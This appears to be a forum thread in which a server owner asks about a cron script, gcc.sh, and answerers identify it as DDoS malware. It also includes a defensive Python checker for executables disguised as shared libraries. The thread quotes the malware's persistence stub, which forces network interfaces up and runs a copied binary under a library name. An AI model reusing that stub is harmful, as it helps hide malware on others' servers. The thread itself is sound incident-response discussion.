
I have been experiencing spikes up to 1 Gbps on my server and have been looking for viruses and malware. I found this file, gcc.sh, in /etc/cron.hourly and was wondering if anyone has seen anything like it and would have some insight into the code. Thanks!

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
cp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6



Quite likely. It uses /lib/libudev.so.6 as an executable while the name implies it should be a library - try using a tool like nm or objdump to see if it's an executable. It copies from /lib/libudev.so to .so.6 - while normally the .so is a symlink to the versioned one. It also runs a for loop to bring up all network connections even if you've turned them off. It uses the name of a well-known compiler to look legit. I'd call this 99%+ likely a virus.

Found another reference to something calling itself gcc - https://superuser.com/questions/863997/ddos-virus-infection-as-a-unix-service-on-a-debian-8-vm-webserver . And yes, that's a DDoS virus on a unix system, exactly matching your problem.

dascandy
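As an added example (not code from the question or from either answer), here is the check the first answer suggests doing with nm or objdump, written in Python: read the ELF header's e_type and scan the program headers for PT_INTERP, which executables (including PIE binaries) carry and genuine shared libraries do not. A file named like a library (`.so`) that turns out to be an executable is flagged. The ELF images it inspects in its own demo are constructed in the block (build_elf64 is a test helper, not a real file), and the /lib paths are used only as labels; on a real host you would call assess_file on the actual path.

```python
"""Check whether a file that is *named* like a shared library is really a
stand-alone executable, by reading its ELF header and program headers.
(Added example; not code from the original question or answers.)"""
import struct
from pathlib import Path

ELF_MAGIC = b"\x7fELF"
ET_NAMES = {0: "ET_NONE", 1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}
PT_INTERP = 3  # program header naming the dynamic loader; present in executables, not libraries


def elf_type(data: bytes):
    """Return the e_type name of an ELF image, or None if it is not ELF."""
    # 64 is the ELF64 header size; any real ELF32 file is far larger than this too.
    if len(data) < 64 or data[:4] != ELF_MAGIC:
        return None
    endian = "<" if data[5] == 1 else ">"          # EI_DATA: 1 = little-endian, 2 = big-endian
    (e_type,) = struct.unpack_from(endian + "H", data, 16)
    return ET_NAMES.get(e_type, f"unknown({e_type})")


def program_header_types(data: bytes):
    """Return the p_type of every program header (handles ELF32 and ELF64)."""
    endian = "<" if data[5] == 1 else ">"
    if data[4] == 2:                                 # EI_CLASS: 2 = ELF64
        (phoff,) = struct.unpack_from(endian + "Q", data, 32)
        phentsize, phnum = struct.unpack_from(endian + "HH", data, 54)
    else:                                            # EI_CLASS: 1 = ELF32
        (phoff,) = struct.unpack_from(endian + "I", data, 28)
        phentsize, phnum = struct.unpack_from(endian + "HH", data, 42)
    types = []
    for i in range(phnum):
        off = phoff + i * phentsize
        if off + 4 > len(data):                      # truncated or bogus header table
            break
        types.append(struct.unpack_from(endian + "I", data, off)[0])
    return types


def classify(data: bytes):
    """Map an ELF image to 'executable', 'pie-executable', 'shared-library', or its raw e_type."""
    t = elf_type(data)
    if t is None:
        return "not-elf"
    if t == "ET_EXEC":
        return "executable"
    if t == "ET_DYN":
        # Both PIE binaries and real libraries are ET_DYN; only executables carry PT_INTERP.
        return "pie-executable" if PT_INTERP in program_header_types(data) else "shared-library"
    return t


def assess(name: str, data: bytes):
    """Return (kind, suspicious): suspicious when a '.so'-named file is actually an executable."""
    kind = classify(data)
    looks_like_lib = ".so" in Path(name).name
    return kind, looks_like_lib and kind in ("executable", "pie-executable")


def assess_file(path: str):
    """Convenience wrapper for an on-disk file such as /lib/libudev.so.6."""
    return assess(path, Path(path).read_bytes())


def build_elf64(e_type: int, phdr_types):
    """Test helper (constructed sample): a minimal little-endian ELF64 image, header plus
    program headers, with just enough bytes for the checks above. It is not runnable code."""
    phentsize, phoff = 56, 64
    ident = ELF_MAGIC + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELF64, little-endian, version 1
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 0x3E, 1, 0, phoff, 0, 0,
                               64, phentsize, len(phdr_types), 64, 0, 0)
    phdrs = b"".join(struct.pack("<IIQQQQQQ", t, 0, 0, 0, 0, 0, 0, 0) for t in phdr_types)
    return ehdr + phdrs


if __name__ == "__main__":
    # Constructed samples standing in for files on the box; the paths are labels only.
    samples = {
        "/lib/libudev.so.6 (sample)": build_elf64(2, [1]),           # ET_EXEC: the case in the question
        "/lib/libfake.so (sample)": build_elf64(3, [1, PT_INTERP]),  # PIE executable posing as a .so
        "/lib/libreal.so.1 (sample)": build_elf64(3, [1]),           # ordinary shared library
    }
    for name, image in samples.items():
        print(name, "->", assess(name, image))
```

On a real file, `readelf -h` ("Type: EXEC" versus "DYN") and `readelf -l` (an INTERP entry) give the same answer; a legitimate libudev build is ET_DYN with no PT_INTERP. Run the check on a copy of the file from a clean machine where possible, since the system's own readelf, nm and objdump binaries are no more trustworthy than anything else on a host that is already running an unknown cron job as root.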

Yes, it is.

Try using ps -ef | grep -i libudev.so.6 to see the processes used by the program.

licklake